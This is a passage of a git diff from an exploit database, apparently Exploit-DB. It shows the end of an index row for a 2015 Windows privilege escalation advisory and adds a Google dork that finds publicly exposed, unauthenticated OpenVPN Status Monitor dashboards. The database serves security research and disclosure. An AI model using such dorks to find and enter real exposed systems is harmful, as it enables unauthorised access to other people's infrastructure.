Escalation",2015-02-26,LiquidWorm,local,windows,,2015-02-27,2015-02-27,0,OSVDB-118804,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5230.php diff --git a/ghdb.xml b/ghdb.xml index 50e24ed84..b58aeab7d 100644 --- a/ghdb.xml +++ b/ghdb.xml 
@@ -116843,6 +116843,24 @@ Linkedin: https://www.linkedin.com/in/hemantsolo/ 2006-04-25 anonymous + + 8399 + https://www.exploit-db.com/ghdb/8399 + Vulnerable Servers + intitle:"OpenVpn Status Monitor" + # Exploit Title: Anonymous Access to OpenVpn Monitoring Dashbaord +# Google Dork: intitle:"OpenVpn Status Monitor" +# Date: 27 Jan 2024 +# Exploit Author: Sabean Technology +# Vendor Homepage: https://github.com/furlongm/openvpn-monitor + +Demewoz Agegnehu | Sabean Technology | https://sabtechx.com + intitle:"OpenVpn Status Monitor" + https://www.google.com/search?q=intitle:"OpenVpn Status Monitor" + + 2024-01-29 + Sabean Technology + 118 https://www.exploit-db.com/ghdb/118